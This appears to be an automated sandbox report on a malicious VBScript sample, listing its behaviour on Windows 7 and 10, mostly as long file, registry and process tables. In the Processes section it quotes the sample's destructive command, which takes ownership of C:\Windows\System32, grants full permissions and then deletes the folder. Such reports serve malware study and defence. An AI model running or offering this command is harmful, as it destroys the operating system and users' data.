Malware Analysis Report

2024-09-11 06:50

Sample ID 240525-ts67hsac8t
Target file01.vbs
SHA256 c8433f6da3e5358d991d7d57cefcfd69905e2bbd8eab4ddc23d229355dabd1b6
Tags discovery exploit
score 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c8433f6da3e5358d991d7d57cefcfd69905e2bbd8eab4ddc23d229355dabd1b6

Threat Level: Likely malicious

The file file01.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Drops file in Drivers directory

Manipulates Digital Signatures

Possible privilege escalation attempt

Executes dropped EXE

Checks computer location settings

Modifies file permissions

Loads dropped DLL

Checks system information in the registry

Drops file in System32 directory

Enumerates physical storage devices

Checks processor information in registry

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-25 16:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 16:20

Reported

2024-05-25 16:22

Platform

win7-20240419-en

Max time kernel

118s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

Signatures

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\System32\wintrust.dll C:\Windows\System32\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dhcpcore.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rasapi32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\urlmon.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ActionCenter.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\imm32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\msutb.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msctf.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dwmredir.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dhcpcsvc6.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lpk.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\resutils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\slc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winlogon.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\bitsigd.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\audiosrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\comctl32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1.LOG C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\profsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AudioEng.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\clusapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIE68D~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIA934~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wx6deg.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\BFE.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\scrobj.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lsasrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msutb.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI03A7~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\csrsrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dwmcore.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ncobjapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\QUTIL.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\webio.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AudioSes.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskcomp.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winsrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\basesrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rasdlg.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\scrrun.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\sppwinob.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\powrprof.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netjoin.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntmarta.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntshrui.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\prnfldr.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\sppsvc.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\DEFAUL~2.LOG C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\snmpapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\mfplat.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\fvecerts.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\FWPUCLNT.DLL C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntdll.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\user32.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\api-ms-win-downlevel-shlwapi-l2-1-0.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netman.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\setupapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MICROS~4.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\TxR\{01688~1.BLF C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\netcfgx.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\usp10.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFC66~1.EVT C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1008 wrote to memory of 2028 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32 /r /d y

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /t

Network

N/A

Files

\Windows\System32\api-ms-win-downlevel-shell32-l1-1-0.dll

MD5 9108540e866f75c7af2b91dd921a8091
SHA1 8a720258c2617e16e8f8658f84ad929d88b02daa
SHA256 7208c8e05e818781d7f2703b86848fc90651e0d8be10362863250f2283cec511
SHA512 d838ab9210623f85d2c4185e5d18d64c4af51e2482cd839529edc182cee954117d5de7b802ac0de757333e8ed6acf8f1f12bd3627a13e694858074d3f7fbc1b4

\Windows\System32\ieframe.dll

MD5 95951e6a277f78fa13a85f2f408f4c0b
SHA1 97eac55ab4453e21e300852c95daa83ae27a3f12
SHA256 c70d3bcd3200816375e3c1d5e0cf8ec008c4072c3360e7a45bb5433b733f825b
SHA512 3eb102962fedf55767fd0247667d25edf2b05cf98b6ba05ef72d33e1fde1acbb5e6e5d7b8b8c65671399bcabf81496eb487c2b59d14cb12e8bd0852f81917eb1

\Windows\System32\wscript.exe

MD5 8886e0697b0a93c521f99099ef643450
SHA1 851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256 d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512 fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 16:20

Reported

2024-05-25 16:22

Platform

win10v2004-20240426-en

Max time kernel

137s

Max time network

94s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\rteth.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cdfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\filecrypt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\fsdepends.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\kdnic.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\monitor.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mouhid.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\pacer.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\afd.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mslldp.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\netbios.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rdbss.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rdpbus.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Ndu.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\PEAuth.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tcpipreg.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbd.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbhub.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\npsvctrig.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\afunix.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cldflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Diskdump.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\dxgmms2.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\http.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mrxsmb.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\msfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\srv2.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\vwififlt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\dfsc.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tdi.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tdx.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\amdppm.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\condrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\csc.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\rspndr.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\CPQSC9~1.SYS C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mmcss.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\Rtnic64.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\tbs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\winhvr.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\i8042prt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\mpsdrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\msquic.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\portcls.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\storqosflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\bindflt.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\gpuenergydrv.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\udfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\watchdog.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ahcache.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\beep.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\drmk.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\nsiproxy.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\wcifs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\cimfs.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hdaudbus.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hidparse.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ks.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\null.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\usbehci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\vhdmp.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\hidusb.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\ksthunk.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\lltdio.sys C:\Windows\System32\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
File opened for modification C:\Windows\System32\wintrust.dll C:\Windows\System32\cmd.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\system32\backgroundTaskHost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\System32\mousocoreworker.exe N/A
N/A N/A C:\Windows\system32\svchost.exe N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Windows\system32\backgroundTaskHost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Windows\system32\backgroundTaskHost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\notificationplatformcomponent.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DesktopShellExt.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\MSHDC~1.INF\storahci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\miutils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\NPSM.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\WinMetadata\Windows.Web.winmd C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\catroot2\edbtmp.log C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Windows\WEBCAC~1.DAT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lmhsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFAE7~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wbem\wbemess.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\lsass.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\profsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\MoUsoCoreWorker.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\coml2.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\oleaccrc.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\backgroundTaskHost.exe C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI82F4~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\catroot2\{F750E~1\catdb C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cloudAP.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\Windows.CloudStore.Schema.Shell.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dlnashext.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ncobjapi.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\TxR\{53B39~2.BLF C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dhcpcsvc6.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\nsisvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\security.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\rsaenh.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\BackgroundMediaPolicy.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\propsys.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dmxmlhelputils.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\cmd.exe.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIFF83~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\wkssvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ClipboardServer.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\dbghelp.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MI8607~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\WinTypes.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\audiosrv.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptxml.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\windows.storage.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\win32kbase.sys.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\TimeBrokerServer.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\winevt\Logs\MIDBEC~1.EVT C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptbase.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptnet.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\dsreg.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\icuuc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\ntasn1.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SYSTEM~1\AppData\Local\MICROS~1\Office\OTele\OFFICE~1.DB C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\CDROM~1.INF\cdrom.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\kerberos.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbehci.sys C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\spoolsv.exe.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\thumbcache.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\AppResolver.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\InputLocaleManager.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\uxtheme.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\config\SAM.LOG1 C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\en-US\combase.dll.mui C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\msprivs.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\Windows.Storage.Search.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\cryptsvc.dll C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\System32\globinputhost.dll C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
